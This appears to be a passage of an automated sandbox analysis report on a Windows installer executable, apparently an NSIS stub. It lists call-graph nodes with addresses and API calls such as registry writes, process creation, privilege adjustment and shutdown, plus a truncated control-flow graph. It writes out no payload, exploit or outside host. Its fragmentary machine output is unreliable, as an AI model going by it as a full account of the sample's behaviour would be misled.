4023 401167 EndPaint 4020->4023 4022->4023 4024 401112 6 API calls 4022->4024 4023->4021 4024->4023 4025 401d81 4026 401d94 GetDlgItem 4025->4026 4027 401d87 4025->4027 4029 401d8e 4026->4029 4028 402d84 17 API calls 4027->4028 4028->4029 4030 401dd5 GetClientRect LoadImageW SendMessageW 4029->4030 4031 402da6 17 API calls 4029->4031 4033 401e33 4030->4033 4035 401e3f 4030->4035 4031->4030 4034 401e38 DeleteObject 4033->4034 4033->4035 4034->4035 4036 401503 4037 40150b 4036->4037 4039 40151e 4036->4039 4038 402d84 17 API calls 4037->4038 4038->4039 4040 402383 4041 40238a 4040->4041 4044 40239d 4040->4044 4042 40657a 17 API calls 4041->4042 4043 402397 4042->4043 4045 405b9d MessageBoxIndirectW 4043->4045 4045->4044 4046 402c05 SendMessageW 4047 402c2a 4046->4047 4048 402c1f InvalidateRect 4046->4048 4048->4047 4049 404f06 GetDlgItem GetDlgItem 4050 404f58 7 API calls 4049->4050 4056 40517d 4049->4056 4051 404ff2 SendMessageW 4050->4051 4052 404fff DeleteObject 4050->4052 4051->4052 4053 405008 4052->4053 4054 40503f 4053->4054 4057 40657a 17 API calls 4053->4057 4058 404499 18 API calls 4054->4058 4055 40525f 4059 40530b 4055->4059 4069 4052b8 SendMessageW 4055->4069 4089 405170 4055->4089 4056->4055 4060 4051ec 4056->4060 4103 404e54 SendMessageW 4056->4103 4063 405021 SendMessageW SendMessageW 4057->4063 4064 405053 4058->4064 4061 405315 SendMessageW 4059->4061 4062 40531d 4059->4062 4060->4055 4065 405251 SendMessageW 4060->4065 4061->4062 4071 405336 4062->4071 4072 40532f ImageList_Destroy 4062->4072 4087 405346 4062->4087 4063->4053 4068 404499 18 API calls 4064->4068 4065->4055 4066 404500 8 API calls 4070 40550c 4066->4070 4082 405064 4068->4082 4074 4052cd SendMessageW 4069->4074 4069->4089 4075 40533f GlobalFree 4071->4075 4071->4087 4072->4071 4073 4054c0 4078 4054d2 ShowWindow GetDlgItem ShowWindow 4073->4078 4073->4089 4077 4052e0 4074->4077 4075->4087 4076 40513f GetWindowLongW SetWindowLongW 4079 405158 4076->4079 4088 4052f1 SendMessageW 4077->4088 4078->4089 4080 405175 4079->4080 4081 40515d ShowWindow 4079->4081 4102 4044ce SendMessageW 4080->4102 4101 4044ce SendMessageW 4081->4101 4082->4076 4083 40513a 4082->4083 4086 4050b7 SendMessageW 4082->4086 4090 4050f5 SendMessageW 4082->4090 4091 405109 SendMessageW 4082->4091 4083->4076 4083->4079 4086->4082 4087->4073 4094 405381 4087->4094 4108 404ed4 4087->4108 4088->4059 4089->4066 4090->4082 4091->4082 4093 40548b 4095 405496 InvalidateRect 4093->4095 4098 4054a2 4093->4098 4096 4053af SendMessageW 4094->4096 4097 4053c5 4094->4097 4095->4098 4096->4097 4097->4093 4099 405439 SendMessageW SendMessageW 4097->4099 4098->4073 4117 404e0f 4098->4117 4099->4097 4101->4089 4102->4056 4104 404eb3 SendMessageW 4103->4104 4105 404e77 GetMessagePos ScreenToClient SendMessageW 4103->4105 4107 404eab 4104->4107 4106 404eb0 4105->4106 4105->4107 4106->4104 4107->4060 4120 40653d lstrcpynW 4108->4120 4110 404ee7 4121 406484 wsprintfW 4110->4121 4112 404ef1 4113 40140b 2 API calls 4112->4113 4114 404efa 4113->4114 4122 40653d lstrcpynW 4114->4122 4116 404f01 4116->4094 4123 404d46 4117->4123 4119 404e24 4119->4073 4120->4110 4121->4112 4122->4116 4124 404d5f 4123->4124 4125 40657a 17 API calls 4124->4125 4126 404dc3 4125->4126 4127 40657a 17 API calls 4126->4127 4128 404dce 4127->4128 4129 40657a 17 API calls 4128->4129 4130 404de4 lstrlenW wsprintfW SetDlgItemTextW 4129->4130 4130->4119 4131 404609 lstrlenW 4132 404628 4131->4132 4133 40462a WideCharToMultiByte 4131->4133 4132->4133 4134 40248a 4135 402da6 17 API calls 4134->4135 4136 40249c 4135->4136 4137 402da6 17 API calls 4136->4137 4138 4024a6 4137->4138 4151 402e36 4138->4151 4141 4024de 4143 4024ea 4141->4143 4146 402d84 17 API calls 4141->4146 4142 402da6 17 API calls 4145 4024d4 lstrlenW 4142->4145 4147 402509 RegSetValueExW 4143->4147 4148 4032b4 31 API calls 4143->4148 4144 40292e 4145->4141 4146->4143 4149 40251f RegCloseKey 4147->4149 4148->4147 4149->4144 4152 402e51 4151->4152 4155 4063d8 4152->4155 4156 4063e7 4155->4156 4157 4063f2 RegCreateKeyExW 4156->4157 4158 4024b6 4156->4158 4157->4158 4158->4141 4158->4142 4158->4144 4159 40498a 4160 4049b6 4159->4160 4161 4049c7 4159->4161 4220 405b81 GetDlgItemTextW 4160->4220 4163 4049d3 GetDlgItem 4161->4163 4169 404a32 4161->4169 4165 4049e7 4163->4165 4164 4049c1 4167 4067c4 5 API calls 4164->4167 4168 4049fb SetWindowTextW 4165->4168 4172 405eb7 4 API calls 4165->4172 4166 404b16 4218 404cc5 4166->4218 4222 405b81 GetDlgItemTextW 4166->4222 4167->4161 4173 404499 18 API calls 4168->4173 4169->4166 4174 40657a 17 API calls 4169->4174 4169->4218 4171 404500 8 API calls 4176 404cd9 4171->4176 4177 4049f1 4172->4177 4178 404a17 4173->4178 4179 404aa6 SHBrowseForFolderW 4174->4179 4175 404b46 4180 405f14 18 API calls 4175->4180 4177->4168 4186 405e0c 3 API calls 4177->4186 4181 404499 18 API calls 4178->4181 4179->4166 4182 404abe CoTaskMemFree 4179->4182 4183 404b4c 4180->4183 4184 404a25 4181->4184 4185 405e0c 3 API calls 4182->4185 4223 40653d lstrcpynW 4183->4223 4221 4044ce SendMessageW 4184->4221 4188 404acb 4185->4188 4186->4168 4191 404b02 SetDlgItemTextW 4188->4191 4195 40657a 17 API calls 4188->4195 4190 404a2b 4193 40690a 5 API calls 4190->4193 4191->4166 4192 404b63 4194 40690a 5 API calls 4192->4194 4193->4169 4196 404b6a 4194->4196 4197 404aea lstrcmpiW 4195->4197 4198 404bab 4196->4198 4206 405e58 2 API calls 4196->4206 4208 404c03 4196->4208 4197->4191 4200 404afb lstrcatW 4197->4200 4224 40653d lstrcpynW 4198->4224 4200->4191 4201 404bb2 4202 405eb7 4 API calls 4201->4202 4203 404bb8 GetDiskFreeSpaceW 4202->4203 4205 404bdc MulDiv 4203->4205 4203->4208 4205->4208 4206->4196 4207 404c74 4210 404c97 4207->4210 4212 40140b 2 API calls 4207->4212 4208->4207 4209 404e0f 20 API calls 4208->4209 4211 404c61 4209->4211 4225 4044bb KiUserCallbackDispatcher 4210->4225 4214 404c76 SetDlgItemTextW 4211->4214 4215 404c66 4211->4215 4212->4210 4214->4207 4217 404d46 20 API calls 4215->4217 4216 404cb3 4216->4218 4219 4048e3 SendMessageW 4216->4219 4217->4207 4218->4171 4219->4218 4220->4164 4221->4190 4222->4175 4223->4192 4224->4201 4225->4216 4226 40290b 4227 402da6 17 API calls 4226->4227 4228 402912 FindFirstFileW 4227->4228 4229 40293a 4228->4229 4232 402925 4228->4232 4234 406484 wsprintfW 4229->4234 4231 402943 4235 40653d lstrcpynW 4231->4235 4234->4231 4235->4232 4236 40190c 4237 401943 4236->4237 4238 402da6 17 API calls 4237->4238 4239 401948 4238->4239 4240 405c49 67 API calls 4239->4240 4241 401951 4240->4241 4242 40190f 4243 402da6 17 API calls 4242->4243 4244 401916 4243->4244 4245 405b9d MessageBoxIndirectW 4244->4245 4246 40191f 4245->4246 4247 401491 4248 40559f 24 API calls 4247->4248 4249 401498 4248->4249 4250 402891 4251 402898 4250->4251 4254 402ba9 4250->4254 4252 402d84 17 API calls 4251->4252 4253 40289f 4252->4253 4255 4028ae SetFilePointer 4253->4255 4255->4254 4256 4028be 4255->4256 4258 406484 wsprintfW 4256->4258 4258->4254 4259 401f12 4260 402da6 17 API calls 4259->4260 4261 401f18 4260->4261 4262 402da6 17 API calls 4261->4262 4263 401f21 4262->4263 4264 402da6 17 API calls 4263->4264 4265 401f2a 4264->4265 4266 402da6 17 API calls 4265->4266 4267 401f33 4266->4267 4268 401423 24 API calls 4267->4268 4269 401f3a 4268->4269 4276 405b63 ShellExecuteExW 4269->4276 4271 401f82 4272 40292e 4271->4272 4277 4069b5 WaitForSingleObject 4271->4277 4274 401f9f CloseHandle 4274->4272 4276->4271 4278 4069cf 4277->4278 4279 4069e1 GetExitCodeProcess 4278->4279 4280 406946 2 API calls 4278->4280 4279->4274 4281 4069d6 WaitForSingleObject 4280->4281 4281->4278 4282 405513 4283 405523 4282->4283 4284 405537 4282->4284 4285 405580 4283->4285 4286 405529 4283->4286 4287 40553f IsWindowVisible 4284->4287 4293 405556 4284->4293 4288 405585 CallWindowProcW 4285->4288 4289 4044e5 SendMessageW 4286->4289 4287->4285 4290 40554c 4287->4290 4291 405533 4288->4291 4289->4291 4292 404e54 5 API calls 4290->4292 4292->4293 4293->4288 4294 404ed4 4 API calls 4293->4294 4294->4285 4295 402f93 4296 402fa5 SetTimer 4295->4296 4298 402fbe 4295->4298 4296->4298 4297 403013 4298->4297 4299 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4298->4299 4299->4297 4300 401d17 4301 402d84 17 API calls 4300->4301 4302 401d1d IsWindow 4301->4302 4303 401a20 4302->4303 3183 403f9a 3184 403fb2 3183->3184 3185 404113 3183->3185 3184->3185 3186 403fbe 3184->3186 3187 404164 3185->3187 3188 404124 GetDlgItem GetDlgItem 3185->3188 3191 403fc9 SetWindowPos 3186->3191 3192 403fdc 3186->3192 3190 4041be 3187->3190 3200 401389 2 API calls 3187->3200 3189 404499 18 API calls 3188->3189 3193 40414e SetClassLongW 3189->3193 3201 40410e 3190->3201 3256 4044e5 3190->3256 3191->3192 3195 403fe5 ShowWindow 3192->3195 3196 404027 3192->3196 3197 40140b 2 API calls 3193->3197 3202 404100 3195->3202 3203 404005 GetWindowLongW 3195->3203 3198 404046 3196->3198 3199 40402f DestroyWindow 3196->3199 3197->3187 3206 40404b SetWindowLongW 3198->3206 3207 40405c 3198->3207 3205 404422 3199->3205 3208 404196 3200->3208 3278 404500 3202->3278 3203->3202 3204 40401e ShowWindow 3203->3204 3204->3196 3205->3201 3214 404453 ShowWindow 3205->3214 3206->3201 3207->3202 3211 404068 GetDlgItem 3207->3211 3208->3190 3212 40419a SendMessageW 3208->3212 3210 404424 DestroyWindow EndDialog 3210->3205 3215 404096 3211->3215 3216 404079 SendMessageW IsWindowEnabled 3211->3216 3212->3201 3213 40140b 2 API calls 3224 4041d0 3213->3224 3214->3201 3218 4040a3 3215->3218 3221 4040ea SendMessageW 3215->3221 3222 4040b6 3215->3222 3229 40409b 3215->3229 3216->3201 3216->3215 3217 40657a 17 API calls 3217->3224 3218->3221 3218->3229 3220 404499 18 API calls 3220->3224 3221->3202 3225 4040d3 3222->3225 3226 4040be 3222->3226 3223 4040d1 3223->3202 3224->3201 3224->3210 3224->3213 3224->3217 3224->3220 3247 404364 DestroyWindow 3224->3247 3259 404499 3224->3259 3228 40140b 2 API calls 3225->3228 3272 40140b 3226->3272 3230 4040da 3228->3230 3275 404472 3229->3275 3230->3202 3230->3229 3232 40424b GetDlgItem 3233 404260 3232->3233 3234 404268 ShowWindow KiUserCallbackDispatcher 3232->3234 3233->3234 3262 4044bb KiUserCallbackDispatcher 3234->3262 3236 404292 EnableWindow 3241 4042a6 3236->3241 3237 4042ab GetSystemMenu EnableMenuItem SendMessageW 3238 4042db SendMessageW 3237->3238 3237->3241 3238->3241 3241->3237 3263 4044ce SendMessageW 3241->3263 3264 403f7b 3241->3264 3267 40653d lstrcpynW 3241->3267 3243 40430a lstrlenW 3244 40657a 17 API calls 3243->3244 3245 404320 SetWindowTextW 3244->3245 3268 401389 3245->3268 3247->3205 3248 40437e CreateDialogParamW 3247->3248 3248->3205 3249 4043b1 3248->3249 3250 404499 18 API calls 3249->3250 3251 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3250->3251 3252 401389 2 API calls 3251->3252 3253 404402 3252->3253 3253->3201 3254 40440a ShowWindow 3253->3254 3255 4044e5 SendMessageW 3254->3255 3255->3205 3257 4044fd 3256->3257 3258 4044ee SendMessageW 3256->3258 3257->3224 3258->3257 3260 40657a 17 API calls 3259->3260 3261 4044a4 SetDlgItemTextW 3260->3261 3261->3232 3262->3236 3263->3241 3265 40657a 17 API calls 3264->3265 3266 403f89 SetWindowTextW 3265->3266 3266->3241 3267->3243 3269 401390 3268->3269 3270 4013fe 3269->3270 3271 4013cb MulDiv SendMessageW 3269->3271 3270->3224 3271->3269 3273 401389 2 API calls 3272->3273 3274 401420 3273->3274 3274->3229 3276 404479 3275->3276 3277 40447f SendMessageW 3275->3277 3276->3277 3277->3223 3279 4045c3 3278->3279 3280 404518 GetWindowLongW 3278->3280 3279->3201 3280->3279 3281 40452d 3280->3281 3281->3279 3282 40455a GetSysColor 3281->3282 3283 40455d 3281->3283 3282->3283 3284 404563 SetTextColor 3283->3284 3285 40456d SetBkMode 3283->3285 3284->3285 3286 404585 GetSysColor 3285->3286 3287 40458b 3285->3287 3286->3287 3288 404592 SetBkColor 3287->3288 3289 40459c 3287->3289 3288->3289 3289->3279 3290 4045b6 CreateBrushIndirect 3289->3290 3291 4045af DeleteObject 3289->3291 3290->3279 3291->3290 3292 401b9b 3293 401ba8 3292->3293 3294 401bec 3292->3294 3300 401c31 3293->3300 3301 401bbf 3293->3301 3295 401c16 GlobalAlloc 3294->3295 3298 401bf1 3294->3298 3296 40657a 17 API calls 3295->3296 3296->3300 3297 40657a 17 API calls 3302 402397 3297->3302 3305 40239d 3298->3305 3313 40653d lstrcpynW 3298->3313 3300->3297 3300->3305 3311 40653d lstrcpynW 3301->3311 3314 405b9d 3302->3314 3303 401c03 GlobalFree 3303->3305 3306 401bce 3312 40653d lstrcpynW 3306->3312 3309 401bdd 3318 40653d lstrcpynW 3309->3318 3311->3306 3312->3309 3313->3303 3315 405bb2 3314->3315 3316 405bfe 3315->3316 3317 405bc6 MessageBoxIndirectW 3315->3317 3316->3305 3317->3316 3318->3305 4304 40261c 4305 402da6 17 API calls 4304->4305 4306 402623 4305->4306 4309 40602d GetFileAttributesW CreateFileW 4306->4309 4308 40262f 4309->4308 3658 40259e 3669 402de6 3658->3669 3661 402d84 17 API calls 3662 4025b1 3661->3662 3663 4025d9 RegEnumValueW 3662->3663 3664 4025cd RegEnumKeyW 3662->3664 3667 40292e 3662->3667 3665 4025f5 RegCloseKey 3663->3665 3666 4025ee 3663->3666 3664->3665 3665->3667 3666->3665 3670 402da6 17 API calls 3669->3670 3671 402dfd 3670->3671 3672 4063aa RegOpenKeyExW 3671->3672 3673 4025a8 3672->3673 3673->3661 4310 40149e 4311 4014ac PostQuitMessage 4310->4311 4312 40239d 4310->4312 4311->4312 4313 4015a3 4314 402da6 17 API calls 4313->4314 4315 4015aa SetFileAttributesW 4314->4315 4316 4015bc 4315->4316 4317 401fa4 4318 402da6 17 API calls 4317->4318 4319 401faa 4318->4319 4320 40559f 24 API calls 4319->4320 4321 401fb4 4320->4321 4322 405b20 2 API calls 4321->4322 4323 401fba 4322->4323 4324 401fdd CloseHandle 4323->4324 4325 40292e 4323->4325 4326 4069b5 5 API calls 4323->4326 4324->4325 4328 401fcf 4326->4328 4328->4324 4330 406484 wsprintfW 4328->4330 4330->4324 4331 40202a 4332 402da6 17 API calls 4331->4332 4333 402031 4332->4333 4334 40690a 5 API calls 4333->4334 4335 402040 4334->4335 4336 4020cc 4335->4336 4337 40205c GlobalAlloc 4335->4337 4337->4336 4338 402070 4337->4338 4339 40690a 5 API calls 4338->4339 4340 402077 4339->4340 4341 40690a 5 API calls 4340->4341 4342 402081 4341->4342 4342->4336 4346 406484 wsprintfW 4342->4346 4344 4020ba 4347 406484 wsprintfW 4344->4347 4346->4344 4347->4336 4348 40252a 4349 402de6 17 API calls 4348->4349 4350 402534 4349->4350 4351 402da6 17 API calls 4350->4351 4352 40253d 4351->4352 4353 402548 RegQueryValueExW 4352->4353 4354 40292e 4352->4354 4355 402568 4353->4355 4358 40256e RegCloseKey 4353->4358 4355->4358 4359 406484 wsprintfW 4355->4359 4358->4354 4359->4358 4360 4021aa 4361 402da6 17 API calls 4360->4361 4362 4021b1 4361->4362 4363 402da6 17 API calls 4362->4363 4364 4021bb 4363->4364 4365 402da6 17 API calls 4364->4365 4366 4021c5 4365->4366 4367 402da6 17 API calls 4366->4367 4368 4021cf 4367->4368 4369 402da6 17 API calls 4368->4369 4370 4021d9 4369->4370 4371 402218 CoCreateInstance 4370->4371 4372 402da6 17 API calls 4370->4372 4375 402237 4371->4375 4372->4371 4373 401423 24 API calls 4374 4022f6 4373->4374 4375->4373 4375->4374 4376 403baa 4377 403bb5 4376->4377 4378 403bb9 4377->4378 4379 403bbc GlobalAlloc 4377->4379 4379->4378 3329 40352d SetErrorMode GetVersionExW 3330 4035b7 3329->3330 3331 40357f GetVersionExW 3329->3331 3332 403610 3330->3332 3333 40690a 5 API calls 3330->3333 3331->3330 3334 40689a 3 API calls 3332->3334 3333->3332 3335 403626 lstrlenA 3334->3335 3335->3332 3336 403636 3335->3336 3337 40690a 5 API calls 3336->3337 3338 40363d 3337->3338 3339 40690a 5 API calls 3338->3339 3340 403644 3339->3340 3341 40690a 5 API calls 3340->3341 3345 403650 #17 OleInitialize SHGetFileInfoW 3341->3345 3344 40369d GetCommandLineW 3421 40653d lstrcpynW 3344->3421 3420 40653d lstrcpynW 3345->3420 3347 4036af 3348 405e39 CharNextW 3347->3348 3349 4036d5 CharNextW 3348->3349 3361 4036e6 3349->3361 3350 4037e4 3351 4037f8 GetTempPathW 3350->3351 3422 4034fc 3351->3422 3353 403810 3355 403814 GetWindowsDirectoryW lstrcatW 3353->3355 3356 40386a DeleteFileW 3353->3356 3354 405e39 CharNextW 3354->3361 3357 4034fc 12 API calls 3355->3357 3432 40307d GetTickCount GetModuleFileNameW 3356->3432 3359 403830 3357->3359 3359->3356 3362 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3359->3362 3360 40387d 3364 403941 3360->3364 3366 403932 3360->3366 3371 405e39 CharNextW 3360->3371 3361->3350 3361->3354 3363 4037e6 3361->3363 3365 4034fc 12 API calls 3362->3365 3516 40653d lstrcpynW 3363->3516 3524 403b12 3364->3524 3370 403862 3365->3370 3460 403bec 3366->3460 3370->3356 3370->3364 3387 40389f 3371->3387 3373 403a69 3375 405b9d MessageBoxIndirectW 3373->3375 3374 403a7e 3376 403a86 GetCurrentProcess OpenProcessToken 3374->3376 3377 403afc ExitProcess 3374->3377 3381 403a76 ExitProcess 3375->3381 3382 403acc 3376->3382 3383 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3376->3383 3379 403908 3384 405f14 18 API calls 3379->3384 3380 403949 3386 405b08 5 API calls 3380->3386 3385 40690a 5 API calls 3382->3385 3383->3382 3388 403914 3384->3388 3389 403ad3 3385->3389 3390 40394e lstrcatW 3386->3390 3387->3379 3387->3380 3388->3364 3517 40653d lstrcpynW 3388->3517 3393 403ae8 ExitWindowsEx 3389->3393 3396 403af5 3389->3396 3391 40396a lstrcatW lstrcmpiW 3390->3391 3392 40395f lstrcatW 3390->3392 3391->3364 3394 40398a 3391->3394 3392->3391 3393->3377 3393->3396 3397 403996 3394->3397 3398 40398f 3394->3398 3400 40140b 2 API calls 3396->3400 3402 405aeb 2 API calls 3397->3402 3401 405a6e 4 API calls 3398->3401 3399 403927 3518 40653d lstrcpynW 3399->3518 3400->3377 3404 403994 3401->3404 3405 40399b SetCurrentDirectoryW 3402->3405 3404->3405 3406 4039b8 3405->3406 3407 4039ad 3405->3407 3520 40653d lstrcpynW 3406->3520 3519 40653d lstrcpynW 3407->3519 3410 40657a 17 API calls 3411 4039fa DeleteFileW 3410->3411 3412 403a06 CopyFileW 3411->3412 3417 4039c5 3411->3417 3412->3417 3413 403a50 3415 4062fd 36 API calls 3413->3415 3414 4062fd 36 API calls 3414->3417 3415->3364 3416 40657a 17 API calls 3416->3417 3417->3410 3417->3413 3417->3414 3417->3416 3419 403a3a CloseHandle 3417->3419 3521 405b20 CreateProcessW 3417->3521 3419->3417 3420->3344 3421->3347 3423 4067c4 5 API calls 3422->3423 3425 403508 3423->3425 3424 403512 3424->3353 3425->3424 3426 405e0c 3 API calls 3425->3426 3427 40351a 3426->3427 3428 405aeb 2 API calls 3427->3428 3429 403520 3428->3429 3430 40605c 2 API calls 3429->3430 3431 40352b 3430->3431 3431->3353 3531 40602d GetFileAttributesW CreateFileW 3432->3531 3434 4030bd 3452 4030cd 3434->3452 3532 40653d lstrcpynW 3434->3532 3436 4030e3 3437 405e58 2 API calls 3436->3437 3438 4030e9 3437->3438 3533 40653d lstrcpynW 3438->3533 3440 4030f4 GetFileSize 3441 4031ee 3440->3441 3459 40310b 3440->3459 3534 403019 3441->3534 3443 4031f7 3445 403227 GlobalAlloc 3443->3445 3443->3452 3569 4034e5 SetFilePointer 3443->3569 3545 4034e5 SetFilePointer 3445->3545 3447 40325a 3449 403019 6 API calls 3447->3449 3449->3452 3450 403210 3453 4034cf ReadFile 3450->3453 3451 403242 3546 4032b4 3451->3546 3452->3360 3455 40321b 3453->3455 3455->3445 3455->3452 3456 403019 6 API calls 3456->3459 3457 40324e 3457->3452 3457->3457 3458 40328b SetFilePointer 3457->3458 3458->3452 3459->3441 3459->3447 3459->3452 3459->3456 3566 4034cf 3459->3566 3461 40690a 5 API calls 3460->3461 3462 403c00 3461->3462 3463 403c06 3462->3463 3464 403c18 3462->3464 3590 406484 wsprintfW 3463->3590 3465 40640b 3 API calls 3464->3465 3466 403c48 3465->3466 3468 403c67 lstrcatW 3466->3468 3470 40640b 3 API calls 3466->3470 3469 403c16 3468->3469 3575 403ec2 3469->3575 3470->3468 3473 405f14 18 API calls 3474 403c99 3473->3474 3475 403d2d 3474->3475 3477 40640b 3 API calls 3474->3477 3476 405f14 18 API calls 3475->3476 3478 403d33 3476->3478 3479 403ccb 3477->3479 3480 403d43 LoadImageW 3478->3480 3481 40657a 17 API calls 3478->3481 3479->3475 3484 403cec lstrlenW 3479->3484 3487 405e39 CharNextW 3479->3487 3482 403de9 3480->3482 3483 403d6a RegisterClassW 3480->3483 3481->3480 3486 40140b 2 API calls 3482->3486 3485 403da0 SystemParametersInfoW CreateWindowExW 3483->3485 3515 403df3 3483->3515 3488 403d20 3484->3488 3489 403cfa lstrcmpiW 3484->3489 3485->3482 3490 403def 3486->3490 3492 403ce9 3487->3492 3491 405e0c 3 API calls 3488->3491 3489->3488 3493 403d0a GetFileAttributesW 3489->3493 3494 403ec2 18 API calls 3490->3494 3490->3515 3495 403d26 3491->3495 3492->3484 3496 403d16 3493->3496 3498 403e00 3494->3498 3591 40653d lstrcpynW 3495->3591 3496->3488 3497 405e58 2 API calls 3496->3497 3497->3488 3500 403e0c ShowWindow 3498->3500 3501 403e8f 3498->3501 3503 40689a 3 API calls 3500->3503 3583 405672 OleInitialize 3501->3583 3505 403e24 3503->3505 3504 403e95 3506 403eb1 3504->3506 3507 403e99 3504->3507 3508 403e32 GetClassInfoW 3505->3508 3510 40689a 3 API calls 3505->3510 3509 40140b 2 API calls 3506->3509 3513 40140b 2 API calls 3507->3513 3507->3515 3511 403e46 GetClassInfoW RegisterClassW 3508->3511 3512 403e5c DialogBoxParamW 3508->3512 3509->3515 3510->3508 3511->3512 3514 40140b 2 API calls 3512->3514 3513->3515 3514->3515 3515->3364 3516->3351 3517->3399 3518->3366 3519->3406 3520->3417 3522 405b53 CloseHandle 3521->3522 3523 405b5f 3521->3523 3522->3523 3523->3417 3525 403b2a 3524->3525 3526 403b1c CloseHandle 3524->3526 3593 403b57 3525->3593 3526->3525 3529 405c49 67 API calls 3530 403a5e OleUninitialize 3529->3530 3530->3373 3530->3374 3531->3434 3532->3436 3533->3440 3535 403022 3534->3535 3536 40303a 3534->3536 3537 403032 3535->3537 3538 40302b DestroyWindow 3535->3538 3539 403042 3536->3539 3540 40304a GetTickCount 3536->3540 3537->3443 3538->3537 3570 406946 3539->3570 3542 403058 CreateDialogParamW ShowWindow 3540->3542 3543 40307b 3540->3543 3542->3543 3543->3443 3545->3451 3547 4032cd 3546->3547 3548 4032fb 3547->3548 3574 4034e5 SetFilePointer 3547->3574 3550 4034cf ReadFile 3548->3550 3551 403306 3550->3551 3552 403468 3551->3552 3553 403318 GetTickCount 3551->3553 3555 403452 3551->3555 3554 4034aa 3552->3554 3559 40346c 3552->3559 3553->3555 3562 403367 3553->3562 3556 4034cf ReadFile 3554->3556 3555->3457 3556->3555 3557 4034cf ReadFile 3557->3562 3558 4034cf ReadFile 3558->3559 3559->3555 3559->3558 3560 4060df WriteFile 3559->3560 3560->3559 3561 4033bd GetTickCount 3561->3562 3562->3555 3562->3557 3562->3561 3563 4033e2 MulDiv wsprintfW 3562->3563 3565 4060df WriteFile 3562->3565 3564 40559f 24 API calls 3563->3564 3564->3562 3565->3562 3567 4060b0 ReadFile 3566->3567 3568 4034e2 3567->3568 3568->3459 3569->3450 3571 406963 PeekMessageW 3570->3571 3572 403048 3571->3572 3573 406959 DispatchMessageW 3571->3573 3572->3443 3573->3571 3574->3548 3576 403ed6 3575->3576 3592 406484 wsprintfW 3576->3592 3578 403f47 3579 403f7b 18 API calls 3578->3579 3581 403f4c 3579->3581 3580 403c77 3580->3473 3581->3580 3582 40657a 17 API calls 3581->3582 3582->3581 3584 4044e5 SendMessageW 3583->3584 3587 405695 3584->3587 3585 4056bc 3586 4044e5 SendMessageW 3585->3586 3588 4056ce OleUninitialize 3586->3588 3587->3585 3589 401389 2 API calls 3587->3589 3588->3504 3589->3587 3590->3469 3591->3475 3592->3578 3595 403b65 3593->3595 3594 403b2f 3594->3529 3595->3594 3596 403b6a FreeLibrary GlobalFree 3595->3596 3596->3594 3596->3596 4380 401a30 4381 402da6 17 API calls 4380->4381 4382 401a39 ExpandEnvironmentStringsW 4381->4382 4383 401a60 4382->4383 4384 401a4d 4382->4384 4384->4383 4385 401a52 lstrcmpW 4384->4385 4385->4383 4391 4023b2 4392 4023ba 4391->4392 4395 4023c0 4391->4395 4393 402da6 17 API calls 4392->4393 4393->4395 4394 402da6 17 API calls 4396 4023ce 4394->4396 4395->4394 4395->4396 4397 402da6 17 API calls 4396->4397 4399 4023dc 4396->4399 4397->4399 4398 402da6 17 API calls 4400 4023e5 WritePrivateProfileStringW 4398->4400 4399->4398 4401 402434 4402 402467 4401->4402 4403 40243c 4401->4403 4404 402da6 17 API calls 4402->4404 4405 402de6 17 API calls 4403->4405 4407 40246e 4404->4407 4406 402443 4405->4406 4409 402da6 17 API calls 4406->4409 4410 40247b 4406->4410 4412 402e64 4407->4412 4411 402454 RegDeleteValueW RegCloseKey 4409->4411 4411->4410 4413 402e71 4412->4413 4414 402e78 4412->4414 4413->4410 4414->4413 4416 402ea9 4414->4416 4417 4063aa RegOpenKeyExW 4416->4417 4418 402ed7 4417->4418 4419 402ee7 RegEnumValueW 4418->4419 4426 402f81 4418->4426 4428 402f0a 4418->4428 4420 402f71 RegCloseKey 4419->4420 4419->4428 4420->4426 4421 402f46 RegEnumKeyW 4422 402f4f RegCloseKey 4421->4422 4421->4428 4423 40690a 5 API calls 4422->4423 4424 402f5f 4423->4424 4424->4426 4427 402f63 RegDeleteKeyW 4424->4427 4425 402ea9 6 API calls 4425->4428 4426->4413 4427->4426 4428->4420 4428->4421 4428->4422 4428->4425 4429 401735 4430 402da6 17 API calls 4429->4430 4431 40173c SearchPathW 4430->4431 4432 401757 4431->4432 4433 401d38 4434 402d84 17 API calls 4433->4434 4435 401d3f 4434->4435 4436 402d84 17 API calls 4435->4436 4437 401d4b GetDlgItem 4436->4437 4438 402638 4437->4438 4439 4014b8 4440 4014be 4439->4440 4441 401389 2 API calls 4440->4441 4442 4014c6 4441->4442 4443 40263e 4444 402652 4443->4444 4445 40266d 4443->4445 4446 402d84 17 API calls 4444->4446 4447 402672 4445->4447 4448 40269d 4445->4448 4455 402659 4446->4455 4450 402da6 17 API calls 4447->4450 4449 402da6 17 API calls 4448->4449 4451 4026a4 lstrlenW 4449->4451 4452 402679 4450->4452 4451->4455 4460 40655f WideCharToMultiByte 4452->4460 4454 40268d lstrlenA 4454->4455 4456 4026d1 4455->4456 4457 4026e7 4455->4457 4459 40610e 5 API calls 4455->4459 4456->4457 4458 4060df WriteFile 4456->4458 4458->4457 4459->4456 4460->4454

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 0040352D Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 0 40352d-40357d SetErrorMode GetVersionExW 1 4035b7-4035be 0->1 2 40357f-4035b3 GetVersionExW 0->2 3 4035c0 1->3 4 4035c8-403608 1->4 2->1 3->4 5 40360a-403612 call 40690a 4->5 6 40361b 4->6 5->6 11 403614 5->11 8 403620-403634 call 40689a lstrlenA 6->8 13 403636-403652 call 40690a * 3 8->13 11->6 20 403663-4036c5 #17 OleInitialize SHGetFileInfoW call 40653d GetCommandLineW call 40653d 13->20 21 403654-40365a 13->21 28 4036c7-4036c9 20->28 29 4036ce-4036e1 call 405e39 CharNextW 20->29 21->20 25 40365c 21->25 25->20 28->29 32 4037d8-4037de 29->32 33 4037e4 32->33 34 4036e6-4036ec 32->34 37 4037f8-403812 GetTempPathW call 4034fc 33->37 35 4036f5-4036fb 34->35 36 4036ee-4036f3 34->36 38 403702-403706 35->38 39 4036fd-403701 35->39 36->35 36->36 47 403814-403832 GetWindowsDirectoryW lstrcatW call 4034fc 37->47 48 40386a-403882 